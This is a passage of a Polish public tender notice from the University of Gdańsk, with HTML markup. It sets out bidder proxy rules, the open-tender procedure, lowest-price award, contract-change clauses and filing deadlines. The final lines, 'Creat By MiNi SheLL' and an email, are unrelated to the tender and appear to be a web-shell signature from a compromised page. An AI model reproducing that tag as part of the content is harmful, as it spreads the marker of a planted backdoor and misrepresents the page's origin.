12)W przypadku, gdy Wykonawcę reprezentuje pełnomocnik (można wystawić jednorazowe pełnomocnictwo do danego konkretnego postępowania), do oferty musi być załączone pełnomocnictwo (o ile pełnomocnictwo dla osób reprezentujących Wykonawcę nie wynika z  dokumentów rejestracyjnych) zawierające datę wystawienia, zakres upoważnienia, okres na które zostało wystawione oraz podpisane przez osoby uprawnione do reprezentacji. W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez osoby udzielające pełnomocnictwa lub notariusza.
13)Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależenie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji dostarczy Zamawiającemu dokumenty dotyczące:
a)zakresu dostępnych Wykonawcy zasobów innego podmiotu,
b)charakteru stosunku, jaki będzie  łączył Wykonawcę  z  innym podmiotem,
c)zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
14)Jeżeli Wykonawca, wykazując spełnianie warunku, o których mowa w rozdziale IV pkt.1 ppkt. 2),  polega na zasobach innych podmiotów na zasadach określonych  w art. 26 ust. 2b ustawy, a  podmioty  te  będą  brały udział  w  realizacji części zamówienia, przedkłada  także  dokumenty dotyczące  tego podmiotu w zakresie wymaganym dla Wykonawcy, określonym w  rozdziale V pkt. 2 SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Istotne zmiany postanowień umowy dopuszczalne są w następujących przypadkach:
1)zmiany obowiązujących przepisów prawa,
2)zaistnienia siły wyższej,
3)zmiany dotyczącej terminu realizacji umowy, jeżeli uzasadnione to będzie okolicznościami leżącymi po stronie Zamawiającego, w szczególności sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi,
4)zmiany dotyczącej w szczególności terminu realizacji zamówienia, gdzie zaistniała inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą każda ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy zgodnie z SIWZ.
2.Odstąpienie od umowy przez Zamawiającego:
1)Zamawiający może odstąpić od umowy, jeżeli wykonanie umowy nie leży w interesie publicznym, zgodnie z art. 145 ustawy prawo zamówień publicznych. W tym przypadku Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.
2)W wypadku określonym w ppkt. 1) Wykonawca  może żądać jedynie wynagrodzenia należnego mu z tytułu wykonania części umowy. 
3)Zamawiający może również odstąpić od umowy na zasadach w ppkt. 1) i 2) niniejszego punktu, w wypadku: ogłoszenia upadłości lub likwidacji przedsiębiorstwa Wykonawcy, wydania nakazu zajęcia majątku Wykonawcy.
4)Zamawiający może odstąpić od umowy w przypadku, gdy usługa jest realizowana wadliwie lub sprzecznie z umową naliczając Wykonawcy karę umowną, o której mowa w § 6 pkt. 1 projektu umowy.
3.Wszelkie  zmiany    umowy  wymagają   dla   swej  ważności  formy pisemnej w postaci  aneksu  podpisanego  przez  obie strony.
4.Wykonawca nie ma prawa cesji praw i obowiązków wynikających z  umowy na rzecz osób  trzecich, z zastrzeżeniem pkt. 12.
5. Cesja wierzytelności Wykonawcy wynikających z niniejszej umowy wymaga dla swej ważności uprzedniej pisemnej zgody Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ug.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rektorat Uniwersytetu Gdańskiego, 80-952 Gdańsk, ul, Bażyńskiego 1 A pokój 124.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2013 godzina 11:00, miejsce: Rektorat Uniwersytetu Gdańskiego, 80-952 Gdańsk, ul, Bażyńskiego 1 A pokój 124.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Zamawiający nie dopuszcza możliwości składania ofert wariantowych. W przypadku, gdy oferta zawierać będzie propozycje rozwiązań alternatywnych lub wariantowych - oferta zostanie odrzucona.
2.Zamawiający nie zamierza zawrzeć umowy ramowej jak i ustanowienia dynamicznego systemu zakupów.
3.Zamawiający nie zamierza dokonać wyboru najkorzystniejszej oferty z  zastosowaniem aukcji elektronicznej.
4.Zamawiający nie dopuszcza możliwości składania ofert częściowych.
5.Zamawiający nie dopuszcza możliwości dokonania przedpłaty. 
6.Zamawiający  nie dopuszcza możliwości składania ofert równoważnych.
7.Koszty opracowania i dostarczenia oferty oraz uczestnictwa w przetargu obciążają wyłącznie   Wykonawcę.
8.Rozliczenia dokonywane będą tylko w złotych polskich.
9.Zamawiający udostępnia SIWZ na stronie internetowej www.ug.edu.pl od dnia zamieszczenia publikacji w Biuletynie Zamówień Publicznych  do upływu terminu  składania ofert.
10.SIWZ w formie papierowej na wniosek Wykonawcy przekazuje się odpłatnie (10 groszy za stronę + koszty przesyłki - listem poleconym za zwrotnym potwierdzeniem odbioru) - art. 42 ust 2 ustawy. (Zamawiający zleci skopiowanie dokumentacji przetargowej).
11.Zamawiający w szczególnie uzasadnionych przypadkach może w każdym  czasie, przed upływem  terminu do składania ofert, zmienić treść SIWZ. Dokonaną  zmianę  Zamawiający przekazuje niezwłocznie wszystkim Wykonawcom, którym  przekazano SIWZ oraz zamieści na stronie internetowej Zamawiającego.
12.Jeżeli zmiana treści SIWZ prowadzi do zmiany treści ogłoszenia o zamówieniu,  Zamawiający  zamieszcza ogłoszenie o zmianie  ogłoszenia w Biuletynie Zamówień Publicznych.
13.Jeżeli w wyniku zmiany treści SIWZ nieprowadzącej do zmiany treści ogłoszenia  o zamówieniu jest niezbędny dodatkowy czas na wprowadzenie zmian  w ofertach,  Zamawiający przedłuży termin składania ofert. 
14.O przedłużeniu terminu składania  ofert Zamawiający niezwłocznie zamieści informację na stronie internetowej  Zamawiającego - art. 38 ust. 6 ustawy.
15.Zgodnie z zapisem art. 8 ustawy Pzp oraz regulacją ustawy o dostępie do informacji publicznej  postępowanie o udzielenie zamówienia publicznego jest jawne. Zamawiający może ograniczyć  dostęp do informacji związanych z postępowaniem tylko w przypadkach określonych  w ustawie.
16.Zamawiający przekazuje do wiadomości Wykonawców projekt umowy - załącznik nr 5 do SIWZ. Wykonawca może nanieść parafkę akceptując projekt umowy załączony do SIWZ na jej ostatniej stronie i załączyć niniejszy projekt do oferty albo ograniczyć się do oświadczenia odnoszącego się do treści umowy zawartego w formularzu ofertowym.                              
17.Podpisanie umowy z wybranym Wykonawcą nastąpi w terminie nie krótszym niż 5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty, jednak nie później niż  w dniu, w którym upływa termin związania ofertą, chyba, że zaistnieją przesłanki przewidziane w art. 94 ust. 2 ustawy pkt. 1 lit. a i pkt. 3 lit a ustawy.
18.Miejscem zawarcia umowy jest siedziba Zamawiającego. Umowa będzie przesłana do podpisu  Wykonawcy lub przedstawiona do podpisu w siedzibie Zamawiającego w zależności od ustaleń dokonanych przez strony.
19.Wykonawca zobowiązany jest do podpisania umowy w terminie wyznaczonym przez Zamawiającego jednak nie później, niż w ciągu 7 dni od dnia otrzymania umowy (lub  przedstawienia jej do podpisu) oraz do niezwłocznego odesłania jej kurierem do Zamawiającego. W przypadku nie zachowania w/w terminu Zamawiający może uznać, iż Wykonawca uchyla się od zawarcia umowy. 
20.Umowa w sprawie zamówienia publicznego może zostać zawarta także po upływie terminu związania ofertą, jeżeli Zamawiający przekazał Wykonawcom informację o wyborze oferty przed upływem terminu związania ofertą, a Wykonawca wyraził zgodę na zawarcie umowy na warunkach określonych w złożonej ofercie.
21.Jeżeli Wykonawca, którego oferta została wybrana, uchyla się od zawarcia umowy w sprawie zamówienia publicznego lub nie wnosi wymaganego zabezpieczenia należytego wykonania umowy, Zamawiający może wybrać ofertę najkorzystniejszą spośród pozostałych ofert bez przeprowadzania ich ponownego badania i oceny, chyba że zachodzą przesłanki unieważnienia postępowania, o których mowa w art. 93 ust. 1 ustawy.
22.Do dnia podpisania umowy Wykonawca zobowiązany jest dostarczyć:
1)kopię umowy regulującej współpracę Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego (art. 23 ust. 4 ustawy) - rozdział V pkt. 5 ppkt 11 SIWZ
23.Zamawiający dopuszcza możliwość korzystania z usług podwykonawców - rozdział V pkt. 3 ppkt. 1 SIWZ.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com